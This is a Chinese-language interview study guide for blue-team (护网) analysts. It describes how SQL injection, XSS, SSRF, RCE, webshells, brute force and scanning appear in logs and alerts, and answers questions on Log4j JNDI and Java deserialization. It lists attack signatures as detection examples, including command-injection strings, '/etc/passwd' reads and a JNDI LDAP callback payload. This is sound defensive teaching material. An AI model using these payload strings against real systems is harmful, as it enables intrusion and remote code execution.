2026护网面试

攻击行为在安全日志与安全告警中的特征表达

1.SQL注入攻击在日志与告警中的典型表现

①流量层面：请求参数中出现 '、or 1=1、union select、order by、information_schema、sleep() 等 SQL 语义片段，且同一 URL 被高频变形请求
同一URL被高频请求，请求参数出现SQL语义片段
②应用与数据库层面：日志中出现 SQL syntax error、SQLSTATE[42000]、ORA- 等报错或同一接口大量 SQL 执行失败，同时响应内容或响应时间随参数变化而变化
日志出现SQL报错，同一接口大量SQL执行失败
③安全设备层面：WAF/SOC 命中 Union 型、报错型或时间盲注等 SQLi 规则，并伴随单 IP 或 UA 的集中扫描与利用行为
WAF命中SQL规则，存在单IP或UA集中扫描行为

2.XSS攻击在日志与告警中的典型表现

①流量层面：请求参数中出现 <script>、onerror、onload、alert()、javascript:、img/src、svg 等脚本特征或其 URL 编码形式，常出现在 search、comment、redirect 等可回显字段
请求参数出现脚本特征
②应用与前端层面：响应包中直接回显 payload（反射型）或页面访问时浏览器触发脚本执行、向外部恶意域名发起请求（存储型），并伴随前端 JS 异常
响应包直接回显，浏览器触发脚本执行，向外部域名发起请求且JS异常
③安全设备层面：WAF 或 SOC 命中 Reflected XSS、Stored XSS 等规则，同一 URL 被多次提交不同脚本变形载荷形成明显攻击特征
WAF命中XSS规则，同一URL被多次提交且存在攻击特征

3.SSRF攻击在日志与告警中的典型表现

①流量层面：请求参数中出现可控的 URL 或 IP（如 url=, file=, redirect=, callback=），并被构造成 127.0.0.1、localhost、169.254.169.254、内网 IP 段或云元数据地址等目标
请求参数出现可控IP/URL
②服务器行为层面，Web 应用在处理该请求时主动向内网或本机发起 HTTP/DNS/TCP 访问，Nginx、应用日志或主机流量中可看到从业务服务器访问内网服务（如 Redis、Elasticsearch、云 metadata）的异常记录
Web处理请求时主动向本机/内网发起访问。日志或流量中发现异常访问记录
③安全设备层面，SOC/WAF/EDR 会产生“SSRF Attempt”“Internal Resource Access”“Metadata Service Access”等告警，常伴随单个外部请求触发多次对内网资源的访问
WAF产生SSRF告警，伴随单个外部请求触发多次对内网的访问

4.RCE攻击在日志与告警中的典型表现

①流量层面：请求参数中出现明显的命令或代码执行特征，如 ; ls、| whoami、&& id、cat /etc/passwd、${jndi:ldap://…}、Runtime.getRuntime()、cmd=、exec= 等，并常被拼接到参数、Header 或文件上传内容中
请求参数出现命令或代码执行特征，并被拼接到参数、Header或文件上传内容中
②主机与应用层面：应用日志中出现命令执行、脚本解释器调用或异常崩溃，同时在系统层可看到由 Web 服务账号（如 www-data、tomcat）发起的 sh、bash、cmd.exe、powershell、curl/wget、nc 等进程及外联行为
日志出现命令执行，存在Web发起外联行为
③安全设备层面，WAF/EDR/SOC 命中“Command Execution”“Webshell”“Log4j RCE”“反弹 shell”等规则，并伴随服务器产生异常子进程、外联 C2 或文件落地行为
WAF命中反弹shell规则，伴随产生异常子进程或文件

5.Webshell攻击在日志与告警中的典型表现

①文件与访问层面：服务器 Web 目录下出现异常脚本文件（如 .php、.jsp、.asp）且文件名、大小或修改时间异常，同时访问日志中频繁请求这些非常规路径并携带可疑参数（如 cmd=、pass=、a=），返回状态多为 200 且长度稳定
web目录下出现异常文件
②主机与应用层面：Web 服务账号（如 www-data、tomcat）频繁拉起 sh、bash、cmd.exe、powershell 等子进程，并通过 WebShell 调用系统命令或读写文件，日志中可看到异常命令执行与文件操作
日志看见异常命令执行与文件操作
③安全设备与 SOC 层面：EDR/WAF 命中“WebShell 上传”“一句话木马”“后门文件”“异常脚本执行”等告警，并伴随服务器向外部 IP 发起回连或下载工具行为
WAF命中webshell告警，伴随回连或下载工具行为

6.暴力破解在日志与告警中的典型表现

①流量与认证层面：同一 IP 或同一 UA 在短时间内对登录接口、VPN、SSH、邮箱、后台管理地址发起大量连续认证请求，用户名固定而密码不断变化，或对同一账号进行高频尝试
同一IP/账号短时间内高频尝试登录，大量连续认证请求
②应用与系统日志层面：出现密集 login failed、invalid password、authentication failure、401/403 记录，且在成功前往往伴随长时间失败尝试，部分场景会突然出现异常来源 IP 的一次登录成功
日志出现密集登录失败请求
③安全设备与 SOC 层面，WAF、堡垒机、VPN、EDR 或 SOC 命中“Brute Force”“Credential Stuffing”“Password Guessing”等告警，并伴随请求速率异常、账号锁定或风控触发
WAF命中相关告警，伴随请求速率异常、账号锁定

7.扫描探测在日志与告警中的典型表现

①流量层面：同一 IP 在短时间内对大量端口、URL 路径或参数发起请求，例如连续访问/admin、/login、/phpmyadmin、/actuator、/.git 等常见敏感路径，或对 80/443/8080/3306/6379 等端口进行快速探测
同一IP短时间内请求大量端口、路径
②系统与应用层面：防火墙、Nginx、服务器日志中出现大量 404、403、connection refused、no route to host 等异常记录，且请求无明显业务连续性，User-Agent 常为 nmap、python-requests、masscan、zgrab 等扫描工具特征
日志出现大量异常记录，UA为扫描工具特征
③安全设备与 SOC 层面：IDS/防火墙/SOC 命中“Port Scan”“Web Scan”“Service Discovery”“资产探测”等规则，表现为单 IP 或网段在短时间内触发大量低质量请求
WAF命中规则，单IP在短时间内触发大量低质量请求

JAVA反序列化RCE利用链

1.WAF 里出现 ${jndi:ldap://x.x.x.x:1389/a} 怎么判断？

这是 Log4j JNDI 注入的典型利用特征，属于高危远程代码执行探测。正常业务不会在参数或 Header 中出现 JNDI 表达式，而且目标端口是 LDAP 的 1389，说明攻击者在尝试让服务器主动回连恶意目录服务，这类告警应直接升级为安全事件。

2.服务器主动访问外部 LDAP/RMI 端口意味着什么？

这在 Web 服务器场景下几乎必然异常，极大概率是 JNDI 注入被触发了，正在向攻击者的 LDAP 或 RMI 服务器拉取恶意对象。

3.IDS 发现 Web 服务器访问 1389、1099、53 端口说明什么？

1389 是 LDAP，1099 是 RMI，53 常被用作 JNDI DNS 探测，这一组端口组合高度指向 JNDI 攻击流量，通常与 Log4j、WebLogic、Fastjson 等漏洞利用直接相关。

4.为什么 Log4j 会导致 RCE？

Log4j 在解析日志内容时支持 JNDI lookup，如果日志中包含可控 ${jndi:ldap://…}，应用会在后台发起 JNDI 查询并加载远程返回的对象，而这个对象在反序列化或类加载时可以执行攻击者构造的代码。

5.JNDI 为什么会变成攻击入口？

JNDI 本来是查找资源的接口，但它允许从 LDAP、RMI 加载远程对象，在某些实现中会自动反序列化或加载远程类，一旦这个地址可控，就变成了“远程代码入口”。

6.Java 反序列化为什么会执行代码？

在反序列化过程中会自动调用对象的 readObject、readResolve、构造函数等方法，如果攻击者利用 Gadget Chain 把这些方法串成一条“命令执行路径”，反序列化时就会自动触发。

7.什么是 Gadget Chain？

就是利用应用和第三方库中已有的类，拼出一条从反序列化入口到 Runtime.exec() 或等价执行点的调用链，ysoserial 中每一个 Payload 本质就是一条不同依赖环境下的 Gadget Chain。

8.看到 Web 服务器访问外部 LDAP，你怎么处置？

先阻断外联 IP 和端口，然后定位触发请求的 URL、Header 或参数，确认是否存在 JNDI 注入，再排查服务器是否有命令执行、文件落地或内存马行为。

9.怎么判断是不是 Log4j 而不是误报？

看是否存在 ${jndi:、ldap://、rmi://，以及访问的是否是公网地址和非业务 LDAP，如果同时存在这两个特征，基本可以判定为攻击。

10.没有回显怎么判断是否成功？

从服务器侧看是否产生外联流量、进程异常、bash、curl、wget、java 子进程，或者日志中是否有异常类加载、反序列化报错。

11.怎么防 Log4j JNDI 攻击？

升级 Log4j 到安全版本，禁用 JNDI lookup，WAF 拦截 ${jndi: 特征，服务器禁止 Web 服务访问外部 LDAP/RMI。

12.禁用 JNDI 就万无一失了吗？

不完全，其他反序列化入口（如 Shiro、Fastjson、WebLogic）仍然可能被利用，所以还需要禁用反序列化危险类型和加强依赖治理。